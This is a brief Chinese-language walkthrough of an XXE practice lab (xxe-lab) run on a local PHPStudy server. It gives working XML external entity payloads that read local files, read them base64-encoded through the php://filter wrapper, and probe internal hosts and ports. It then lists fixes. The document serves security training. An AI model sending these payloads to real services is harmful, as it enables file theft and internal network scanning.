环境配置
1.将靶场进行下载....
https://github.com/c0ny1/xxe-lab2.将PHPStudy的中间件与版本信息调制为php-5.4.45+Apache访问以下地址开始练习...
http://127.0.0.1/xxelabs/php_xxe/
靶场实操
1.在登录界面输入账号密码并抓取数据包....
2.尝试读取本地文件....
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE XL [
<!ENTITY fl SYSTEM "file:///d:/test.txt">]>
<user><username>&fl;</username><password>asdf</password></user>
3.使用PHP伪协议读取文件....
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE XL [
<!ENTITY fl SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">]>
<user><username>&fl;</username><password>asdf</password></user>
4.探测内网存活主机与端口...
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE XL [
<!ENTITY fl SYSTEM "http://127.0.0.1:80">]>
<user><username>&fl;</username><password>asdf</password></user>
漏洞修复
- 使用开发语言禁用外部实体;
- 过滤SYSTEM/PUBLIC等关键字;
- 升级 libxml 组件
